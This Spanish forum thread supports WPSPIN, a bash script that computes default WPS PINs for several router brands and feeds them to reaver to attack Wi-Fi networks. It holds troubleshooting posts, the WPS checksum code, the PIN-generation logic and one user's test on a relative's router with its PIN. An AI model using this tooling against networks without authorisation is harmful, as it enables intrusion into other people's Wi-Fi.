Perdona kcdtv. De momento ni copio ni pego. Probado con Backtrack 5 y funcionando perfectamente.
Tu mismo, yo sin ello no puedo hacer nada.  ;)
Dices que tu live es slax.
Probaría instalar sudo y actualizar xterm.
Así me funcionó en una live basada en portheus 2 que también se baza en slackware





Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lupox en Junio 23, 2013, 22:06:01 pm
Tu mismo, yo sin ello no puedo hacer nada.  ;)
Dices que tu live es slax.
Probaría instalar sudo y actualizar xterm.
Así me funcionó en una live basada en portheus 2 que también se baza en Slackware

Lo único que puedo indicar es que falla al copiar la redes al archivo sacan.txt, no se genera. Si  lo creamos nosotros y pegamos la pantalla del airodump entonces  genera el wash-scan.txt  y podemos continuar el proceso de forma normal.

Sudo y xterm no parecen ser el problema, por lo menos no lo solucionan.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 25, 2013, 16:29:14 pm
¿Has probado ejecutar el script como root?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lupox en Junio 26, 2013, 17:32:08 pm
¿Has probado ejecutar el script como root?

Siempre soy root

Enviado usando Tapatalk 2
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 27, 2013, 16:04:49 pm
 voy a re-explicar lo que es necesario para exponer un fallo

Simplemente se necesitan dos elementos  ;)

   1  -  distibucion GNU linux 
     
          truco: para ello basta con entrar en consola
         
Código: [Seleccionar]
uname -m          y pegar el resultado aquí

  2 -   copiado pegado entero de todo lo que pasa en consola desde el lanzamiento del script hasta el final  ( usad el opciùón insertar codigo para ello  ;) )
 
           
Pongo un ejemplo para que quede claro

ejemplo :
Citar
Tu

"Aqui tienes mi distribución

Código: [Seleccionar]
Linux noname4u 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali6 i686 GNU/Linux
ejecuto el script y no me reconoce la interfaz pero es compatible ( rtl8197l }, este es el log

Código: [Seleccionar]
mayo/WPSPIN/WPSPIN$ bash WPSPIN.sh

              _       _  _____    _____   _____  _______  _     _
             (_)  _  (_)(_____)  (_____) (_____)(_______)(_)   (_)
             (_) (_) (_)(_)__(_)(_)___   (_)__(_)  (_)   (__)_ (_)
             (_) (_) (_)(_____)   (___)_ (_____)   (_)   (_)(_)(_)
             (_)_(_)_(_)(_)       ____(_)(_)     __(_)__ (_)  (__)
              (__) (__) (_)      (_____) (_)    (_______)(_)   (_)   

     www.crack-wifi.com     www.lampiweb.com    www.auditoriaswireless.net

               by kcdtv feat. antares_145,  r00tnuLL and 1camaron1
               including computepinC83A35 algorithm by ZaoChunseng

                   DEFAULT PIN GENERATOR & WPS PROTOCOL ATTACK


                         +---------------------------+     
                         |     1  -  ENGLISH         |     
                         |     2  -  ESPANOL         |     
                         |     3  -  FRANCAIS        |     
                         +---------------------------+     
 

                                Language : 2
WPSPIN.sh: ligne564: iw : commande introuvable

              ADVERTENCIA : ¡ NO INTERFAZ COMPATIBLE DETECTADA ¡ 
     WPSPIN se ejecutará solo en modo generador (sin escaneo, sin ataque)
          puede redetectar las interfaces con el opción redetectar



                                     ¿     ?           
                                ?       ?             
                               ¿   >X<    ¿         
                               -  (O o)  -         
                    +---------ooO--(_)--Ooo-------------+   
                    |                                   |   
                    |    1 -  GENERAR PIN               |   
                    |    2 -  REDETECTAR INTERFACES     |   
                    |    3 -  SALIR                     |   
                    |                                   |   
                    +-----------------------------------+   




                              su elección :



Yo /

Veo que usas kali y que iw no se ejecuta. Es porque estas ejecutando el script desde tu cuenta de usuario ( muy recomendable  ;) )
Ejecutar el script asi y no tendrás este problema

Código: [Seleccionar]
sudo bash WPSPIN.sh
"

hay problemas por los cuales se puede necesitar mas información, pero con esto dos elementos ya se puede determinar 90% de los problemas.
Sin ellos no puedo decir, saber nada  :-[
saludos



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: r00tnull en Julio 23, 2013, 18:12:16 pm
kcdtv te iba a mandar el pin por privado, pero como lo tienes lleno pues ya lo pongo aquí, así la gente que pueda, lo verifique. Es para los Thomson, lo malo es que no esta activado por defecto:
[img width=540 height=269]http://uploadpie.com/tlFxm[/img]

pd: Click en la imagen para agrandar. La imagen se borrará en una semana.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Julio 23, 2013, 18:57:03 pm

Buenas r00tnull

Citar
kcdtv te iba a mandar el pin por privado, pero como lo tienes lleno
Si en algún momento te sucede lo mismo puedes hacérmelo llegar a mi y ya me pongo en contacto con kcdtv o cualquiera del grupo / staff por otras vías.

Esto por lo que veo y entiendo a priori sería un PIN genérico, el tema es patrones de PIN WPA.. ya si eso cuando se verifique muevo las respuestas allí.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cell- en Julio 24, 2013, 16:14:37 pm
Lo dicho, HG556a, no 566.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Julio 24, 2013, 16:50:57 pm
visto,
gracias  ;)
hay otros sitio donde se ha colado  "lo dicho" o estamos bien con el HG556a?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Julio 24, 2013, 23:12:32 pm
Citar
hay otros sitio donde se ha colado  "lo dicho" o estamos bien con el HG556a?
Si..  si no me equivoco con tanto nº en la lista de soportados online.. ignoro ya si en mas sitios.

Citar
Fabricante >   HUAWEI
essid      >   vodafoneXXXX
modelo     >   HG566a

cell- gracias.  Igualmente sería también de agradecer el ser "algo" mas específico en cuanto a ubicaciones de dichos gazapos..  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lobodem4r en Agosto 05, 2013, 21:49:18 pm
Hola, podríais resubirlo?...el dominio donde estaba alojado está OFF.

Gracias por la aplicación.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Agosto 05, 2013, 22:15:13 pm

Buenas..

Es temporal..  el sitio amigo donde está alojado WPSPIN junto a la lista online (Auditorías Wirless locos por el Wifi) está estos días en mantenimiento por unos cambios que son precisos de hacer.

última versión re-subida temporalmente:

WPSPIN

BSSID_online

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lobodem4r en Agosto 05, 2013, 23:00:21 pm
Mil Gracias!.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Agosto 09, 2013, 00:09:11 am
Muchas Gracias maripuri, estas en todo  :)
En efecto el dominio esta fuera de servicio  para un tiempo, no había pensado en ello.... Debería volver dentro de muy poco a no ser que el dueno y su equipo estén tomando margarita en la playa.  8)
por suerte esta el mariupload para sacarnos de apuros  :P
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Agosto 11, 2013, 22:58:23 pm
El enlace esta caido, podrian resubirlo.Gracias de antemano...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gladiator1976 en Agosto 11, 2013, 23:01:22 pm
El enlace esta caido, podrian resubirlo.Gracias de antemano...

hola

lee tres respuestas mas arriba, ahí lo tienes
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Agosto 12, 2013, 11:27:18 am

Añadimos la descarga temporal y la lista de BSSID al final del 1er hilo porque no será la última vez que pregunten..  ya las quitamos cuando se arreglen los enlaces de las oficiales.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Agosto 12, 2013, 16:51:14 pm
Gracias maripuri.
Parece que lo relativo a WPSPIN se ha perdido en la renovación del sitio ya que este a vuelto a funcionar pero mis archivos están no se dónde...
A ver que me dicen...  :P
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ea3ot en Agosto 20, 2013, 01:52:32 am
PIN de Vodafone  conseguido con nueva MAC en teoria no soportada=  62:96:BF:6B: etc.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Agosto 20, 2013, 10:18:27 am

Buenas..

Mas bien BSSID desconocido que no soportado como has comprobado..  como hemos comentado en muchas ocasiones la lista es de BSSID conocidos pero creemos que (con toda probabilidad) facilmente pueda llegar a ser tres veces mayor.

Adjúntame si no te importa PIN + BSSID + imagen donde podamos corroborarlo por MP
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ea3ot en Agosto 20, 2013, 11:15:19 am
Buenas..

Mas bien BSSID desconocido que no soportado como has comprobado..  como hemos comentado en muchas ocasiones la lista es de BSSID conocidos pero creemos que (con toda probabilidad) facilmente pueda llegar a ser tres veces mayor.

Adjúntame si no te importa PIN + BSSID + imagen donde podamos corroborarlo por MP

OKis
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arnaugamez en Agosto 31, 2013, 20:53:17 pm
Hola, creo que estoy experimentando un bug en el programa. Espero que sea solo una cuestión personal y no haya pasado a más gente. Estaba testeando el WPSPIN con la red de mi tío. En principio es vulnerable, y detecta su pin por defecto durante el escaneo, el problema es que cuando la seleccionas para atacar el pin que te da para atacar con reaver es otro, de 9 dígitos! y que no se correspone con el bueno, que es el que saca al principio, el 23683877 (comprobado). Una imagen vale más que mil palabras, así que os lo dejo aquí.

(http://i.imgur.com/KM8jNXf.png)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Agosto 31, 2013, 22:08:59 pm

Citar
el problema es que cuando la seleccionas para atacar el pin que te da para atacar con reaver es otro, de 9 dígitos! y que no se correspone con el bueno
En realidad es el PIN bueno solo que le por alguna extraña razón le coloca un 1 (uno) al comienzo del mismo.  Ya nos dirá algo kcdtv..   gracias por comentar.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 01, 2013, 00:28:05 am
gracias por informar.
voy a corregir esto  ;)





Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: juanjo328 en Septiembre 01, 2013, 14:04:00 pm
Hola,

Estoy probando con un LiveUSB boteado desde USB, descomprimiendo desde el escritorio y no hay forma de que me detecte el interface y he probado con una Alfa, crotalus y atheros. No reconoce ninguna.
Que puede ser?
Saludos y gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 01, 2013, 14:11:46 pm
El script usa el comando iwairmon-ng para detectar los dispositivos.
Que obtienes con
Código: [Seleccionar]
airmon-ng en consola ?
y con
Código: [Seleccionar]
sudo iw dev?
Puedes colocar un copiado pegado de todo lo que pasa en consola desde el  orden de lanzamiento del script hasta el fallo?
Usas un portátil con botón de encendido del wirelesss?

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Clima-sol-84 en Septiembre 01, 2013, 14:41:50 pm
kcdtv gracias por corregirlo eres una maquina y todos los dias o lo currais de una manera sorprendente saludos y animo :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Clima-sol-84 en Septiembre 01, 2013, 14:49:06 pm
 maryo15151 modifica el mensaje saludos  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 01, 2013, 14:58:24 pm
Que sistema operativo?
Puedes poner un copiado pegado de todo lo que pasa en consola?
Ves punto de acceso en la ventana de scan con wash?
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 01, 2013, 16:06:14 pm
Se agradece la oferta  :)
Aqui te explicamos como colaborar Hilo de recogida de datos centralizado
PD: Podrías decir con que distribución lo has echo funcionar por favor? ( la que no te la pido  ;) )
 
Código: [Seleccionar]
uname -a
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Septiembre 01, 2013, 19:07:09 pm
maryo15151 en adelante por favor antes de escribir nada esmérate un poco en redactar, es un suplicio intentar descrifrar el contenido de tus textos.. no me malinterpretes, ni lo digo con mala intención pero es así.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 01, 2013, 22:20:41 pm
solo valen y interesan datos seguros y completos con elementos que garantizan su autenticidad ( lo ideal siendo una foto de la pegatina dónde están  los datos personales, sino capturas de pantalla de la configuración del routeur. )
todo esta explicado en el link que te puse antes > Hilo de recogida de datos centralizado  ;)


Como te lo indica el script hay varios midelos con esto tipo de incio de bssid (00:1A:2B)
el pin no es "malo" sino que vale para un modelo determinado de router.


(http://img14..us/img14/8474/vnr2.png)


(http://storage8.static.itmages.com/i/13/0603/h_1370271665_6119315_6c41b73f87.png)


Las investigaciones sobre PIN WPS genéricos o patrones de PIN se hacen más bien en este hilo > Patrones de PINs para WPA
Si lees en este hilo  a partir del mensaje 546 evocamos este caso de los routers Comtrend Jazztel con inicio mac 00:1A:2B 
Todos los datos por defecto completos y seguros están bienvenidos para poder averiguar mas sobre otros modelos - otros PIN genéricos  ;)
Saber el modelo del router es de primera importancia con este rango de bssid ya que hay muchísimos modelos, incluso unos de telefónica con essid WLAN_XXXX, otros que vienen con WEP por defecto etc...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Septiembre 01, 2013, 23:13:01 pm
offtopic on

Citar
ola buenas perdona che lo escrive asi linux backbox
Siento el offtopic pero tal vez deberías investigar un poco como se cambia el idioma o se compatibilza el teclado..  la verdad es que con tanto "che" "jo" y cosas así es realmente incómodo. En el subforo linux sistema tal vez te pueda ayudar algún compi si no eres quien a hacerlo por ti mismo.

Saludos.

offpic off
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: juanjo328 en Septiembre 05, 2013, 22:05:26 pm
Hola de nuevo compañeros, finalmente he conseguido que me detecte las tarjetas de red:
AtherosAR2425 (Tarjeta interna)
RalinkRT2870/3070 (Pincho USB crotalus max)
Estoy en un portatil con un Live CD boteado desde un USB (No desde el CD con un apaño) version Live de auditoria, en el programa he quitado todos los "sudo" y funciona. El problema ahora es que cuando lanzo el modo guiado el walsh no detecta nada, alguna idea???
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 05, 2013, 22:37:06 pm
Pon un copiado exacto del log de errores ( desde el incio del script hasta el fallo )
Sea mas descriptivo sobre el sistema operativo utilizado, hay cienes de distribuciones, cual es exactamente?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arnaugamez en Septiembre 06, 2013, 15:08:55 pm
Por cierto kcdtv, me ha vuelto a ocurrir lo mismo con otro punto de acceso, curiosamente el mismo router, aunque bssid distinto. Te paso la captura de pantalla. ¿Ya sabes qué puede ser?
(http://i.imgur.com/mhOdFyh.png)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 06, 2013, 15:32:07 pm

No se porque, jugando con versiones y pruebas, se me quito un paso al momento de generar los FTE-XXXX con essid valido ( solo en este caso )
Este paso se encarga de quitar la primera cifra del PIN si este es superior a 99999999
De momento cuando sucede ponéis el PIN en reaver o inflator sin el primer dígito., tal como sale en el  la lista de ojectivos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arnaugamez en Septiembre 06, 2013, 15:39:29 pm
Supongo que cuando se saques una nueva versión estará corregido.
Solo por curiosidad, ¿cómo es posible que genere/muestre un pin superior a 9999999; no son de 8 cifras?, ¿qué algoritmo se usa para generar el pin, o está en una base de datos?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 08, 2013, 04:10:12 am
Citar
Supongo que cuando se saques una nueva versión estará corregido.
Esto es

Citar
Solo por curiosidad, ¿cómo es posible que genere/muestre un pin superior a 9999999; no son de 8 cifras?,
Es posible porque desgraciadamente lo he echo yo  ;D
Se me ha borrado una linea entre versiones en contra de mi voluntad, pero es así, son cosas del vivo  :P
El script llevaba hasta ahora una linea:
Código: [Seleccionar]
STRING=`expr '(' $PRESTRING '%' 10000000 ')' `Que quita el 1 que sobre en el PIN que pones en el ejemplo que pones.
esto pasa con fines bssid superiores a 98:96:80 en el caso de routers FTE
Un "bug"

Citar
¿qué algoritmo se usa para generar el pin, o está en una base de datos?

Si el PIN es genérico esta atribuido a las características del router desde el inicio ( variable PIN en el código )
Si el router no tiene PIN genérico se deja el valor de PIN vasillo y se generará en vivo
Para ello el script usa tres algoritmos, tienes los detalles en el readme y el código esta anotado.  ;)
Uno de los algoritmos es igual al que descubrió paralelamente zhaochunsheng en unos routers Tenda en un script llamado "Computepin"
( vodafone, belkin y otros )
El algoritmo que tiene este "bug" es el para  FTE ( plus unos jaztell )  y es el que he descubierto y que nos hizo meter el dedo en el engrenage.
 Y El tercero fue elaborado en un segundo tiempo por el grupo de trabajo y es para los bssid FTE con ESSID desconocido ( en este caso se genera tres PIN )
Están al inicio de script en funciones anotadas, es la primera cosa que te encuentras después los colores
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arnaugamez en Septiembre 08, 2013, 12:11:04 pm
Citar
Es posible porque desgraciadamente lo he echo yo
Suele pasar ;)

Me queda claro el tema de los pins, muchas gracias.

Citar
Están al inicio de script en funciones anotadas, es la primera cosa que te encuentras después los colores
Intentaré echarle un vistazo, aunque bash no es lo mío (todavía)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 08, 2013, 12:39:24 pm
Lo más "complicado" ( por lo menos para mi } en el código es desde lejo escribir la regla del checksum wps ( gracias antares_145 ).
es la funcción checksum en el script

(http://img542..us/img542/2321/0ik2.png)

Código: [Seleccionar]
CHECKSUM(){                                                                  # The function checksum was written for bash by antres_145 form crack-wifi.com
PIN=`expr 10 '*' $STRING`                                                    # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
ACCUM=0                                                                      # to get a result using this function)
                                                             
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`       # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`             # so we follow the pattern for our seven number

DIGIT=`expr $ACCUM '%' 10`                                                   # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                                 # the cheksum is equal to " 10 minus  digit control "

PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                             # Some zero-pading in case that the value of the PIN is under 10000000   
}                                                                            # STRING + CHECKSUM gives the fulll WPS PIN

en bash r00tnuLL nos habia dado otra sintaxis  usando un bucle while basándose en el script en C de zhaochunsheng, (  Compute PIN para router TENDA )

Código: [Seleccionar]
# Función que genera el checksum. Algoritmo de ZaoChunsheng.
FUNC_CHECKSUM(){
    ACCUM=0
    while [ $PIN -ne 0 ]; do
      ACCUM=$((ACCUM += 3 * (PIN % 10)))
      PIN=$((PIN /= 10))
      ACCUM=$((ACCUM += PIN % 10))
      PIN=$((PIN /= 10))
    done
    CHECKSUM=$(((10 - ACCUM % 10) % 10))     # Por último se halla el valor para añadirlo al pin.
}


En python es así

Código: [Seleccionar]
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
        # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
    accum = 0
    t = pin
    while (t):
        accum += 3 * (t % 10)
        t /= 10
        accum += t % 10
        t /= 10
    return '%i%i' % (pin, (10 - accum % 10) % 10)



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: andolff en Septiembre 23, 2013, 18:31:26 pm
buenas. e booteado mi portatil con un cd live  . he extraido la carpeta descargada..abri una consola poniendo en ella cd y arrastrando la carpeta descargada. y despues poniendo en el mismo directorio bash wpspin.sh.
ahi siguendo los pasos de modo guiado al hacer wash me detecta varias redes , pero al cerrar la ventana con control+c o dandole a cerrar, no me aparece ningun objetivo y no puedo seleccionar ningun objetivo.. cual es el problema¿? gracias ayúdame
y antes de aparecer la lista de objetivos vacio me dic esto: 
cat: scan.txt : no existe el fichero o directorio
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 23, 2013, 20:40:55 pm
 
Cita de: andolff
con un cd live

Cual? Hay miles de distribuciones.
Lo primero es decir la distribución utilizada y luego hacer copiados pegados utilizando el opción insertar código, es más rápido y preciso que describir aproximadamente los pasos seguidos y el curso de los eventos.  ;)

Parece que tu live no da permisos de escritura al script ; podrías empezar por dar le permisos
(
Código: [Seleccionar]
chmod -R 777 WPSPIN )

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pongui2 en Octubre 04, 2013, 12:19:21 pm
Buenas! en principio muchísimas gracias por este pedazo d script que tanto me ha ayudado, de hecho se ha convertido en una de mis prioridades entre los programitas de auditorias jejej pero me ha salido una duda y es que si tienes o tenéis idea de como podría yo ejecutar este script en maemo en un nokia N900...me sería muy interesante pero al ejecutarlo me suelta unos cuantos errores como por ejemplo:

line 118: conditional binary operator expected
line 118: syntax error near `=~'

así unos cuantos mas con otros caracteres...¿alguna idea? que es lo que me faltaría por instalarle?

Gracias! y un saludoo :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Octubre 04, 2013, 14:52:32 pm
Muchas gracias por tus comentarios, dan animo  :)

La linea que da problema es  esta
Código: [Seleccionar]
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&   [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
Podría arreglarse actualizando tu versión de bash
Sino  se podría escribir las lineas que dan problema de otra manera para android....

Mala suerte que sea justamente esta condición porque esta me costo redactarla, diría unas horas  :P

Necesitaría que me des los otros fallos porque aun no me queda claro lo que pasa o parece que hay dos cosas que pasan:

Código: [Seleccionar]
line 118: conditional binary operator expected se esperaba un valor numérico para efectuar una comparación y se obtuvo un valor no numérico.

Código: [Seleccionar]
line 118: syntax error near `=~' sería el  [[:xdigit:]] que falla.

mirare esto cuando tendré un rato para hacer lo de otra forma con una sintaxis menos limpia pero mas básica para que tenga mas probabilidades de funcionar.

Mira que versión de bash tenes y intenta actualizarla a ver que pasa, puede bastar.
No tengo hardware android para hacer pruebas pero si tenes interés y no te molesta ser "beta-tester"  :P, creo que se dice así, pues podemos buscar una solucón, no es problema introducir condiciones para que se modifique la sintaxis si se usa un sistema android.

saludos  :)



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pongui2 en Octubre 04, 2013, 16:47:37 pm
Bueno se me ha escapado decirte que el Nokia N900 que es en el que lo he probado esta basado en debian, he comprobado la versión de bash como me has dicho desde el apt-get y me ha dicho que tengo la ultima versión instalada sin embargo me he ido a android porque aun no lo había probado y con la ultima versión de busybox y con un programa aparentemente actual de ejecutar scripts lo he puesto y me ha saltado el error en la misma linea con lo mismo en android se ha quedado la cosa así:

Código: [Seleccionar]
line 118: syntax error near `=~'
Y en el nokia basado en debian me ha dicho esto:

Código: [Seleccionar]
line 118: conditional binary operator expected
line 118: syntax error near `=~'
line 118: ` if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&   [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];  '

He probado a separar el primer error que ha encontrado osea de `=~'  a  `= ~' lo he guardado y lo he vuelto a ejecutar y entonces el error ha sido así:

Código: [Seleccionar]
line 118: syntax error in conditional expression
line 118: syntax error near ` ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ '
line 118: ` if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&   [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];  '


Dichosa linea 118 jajaj da error en maemo y en android.. cualquier modificación que pueda hacerle dímelo y la pruebo que tu script salga ha funcionar en todas las plataformas jajaj y gracias por prestarte a ayudar en la adaptación :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: guest48471 en Octubre 07, 2013, 15:57:17 pm
ola buenas yo tengo un problemiya con el script uso w4.6 lo abro con la terminal y me va perfecto asta la ora de elegir la red que kiero atacar no me sale las redes captada por que????
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Octubre 07, 2013, 16:09:56 pm
Que sea con wifislax 4.6 o lo que sea, no te puedo decir nada si solo me das esta información, puede haber tantas razones  ;)
creo que si lees un poco antes explico como reportar un bug....
Necesito un copiado pegado de todo lo que pasa en consola.Desde que te situas con cd hasta el fallo.
Lo pones usando el opción insertar código



Octubre 07, 2013, 16:22:24 pm
gracias pongi y buena idea probar algo para ver ...   ;)
no le gusta esta sintaxis esta claro  ;D
mirare para escribirlo de otra forma ya que vamos a dar golpes de espalda en el agua asi, mejor hacer otra sintaxis mas simple en varias etapas y de ahi ver como simplificarlo...... 

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: guest48471 en Octubre 07, 2013, 21:22:26 pm
abro el script pongo español y le doy al uno un atake guiado y ai me buscas las redes pero cuando cierro esa ventana no me sale las redes para selecionar unahttp://storage4.static.itmages.com/i/13/0603/h_1370266948_5143730_42120b40b5.png esta es la foto que es lo que no me sale
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Octubre 07, 2013, 21:31:29 pm
 copiado pegado de todo lo que pasa en consola
Todo es todo desde el  lanzamiento hasta el final.
la foto usa el opción insertar imagen al lado de youtube  ;)

PD: imagino que sabes que se ha levantado la interdicción sobre "el foro linux" y que puedes poner copiados pegados echos desde su distribución sin problemas.
Lo digo por si acaso.

Necesito un copiado pegado con todo, no me sirven capturas de pantalla, y es mas facil, copiar-pegar  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pongui2 en Octubre 16, 2013, 13:12:27 pm
Buenas!  He conseguido iniciar el script en Android en el galaxy s2 al final es lo que tu decías... solo tenía que buscarme un bash mas funcional... y así ha sido alaa script funcionando pero claro no todo iba a ser bonito y fácil jeje  el problema ahora es que las listas de interfaces pues no están en la misma dirección que en el script entonces inicia en modo de detección manual de pines.. y el error lógico de las interfaces es este:
(http://img5..us/img5/4861/62qx.png)

Con lo que me quedo es con poder sacar pin manualmente, pero la idea es lo automático jajaj he estado mirando y no he encontrado una lista de interfaces dentro del android... pero si que he encontrado una dirección /sys/class/net que contiene separadas por carpetas cada una de las interfaces del móvil esta es la captura:
(http://img842..us/img842/9314/zode.png)

Cuando yo pongo el movil en modo monitor, se me queda en wlan0 en modo monitor... he probado por separado el wash y el reaver y funciona perfectamente entonces tendria que modificar la dirección de detección de interfaces pero al no ser un archivo .txt con las interfaces como podria ponerlo¿? o simplemente me tengo que olvidar de una adaptación así¿? ya que dspues de adaptar el sitio de búsqueda de la interface también habría que poner el sitio desde donde iniciar el wash no? osea que sería un script totalmente diferente... creo que lo mas viable es que me conforme con que puedo introducir la mac manualmente y que me de el pin para yo introducirlo por separado en el reaver no? xD
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Octubre 16, 2013, 15:47:54 pm
Yessssssssss  8)
genial   ;)
mejor porque la sintaxis del bucle incriminado antes es difícil de retocar sin aumentar la sintaxis, son cuatro condiciones con operandor OR y así tiene que ser.

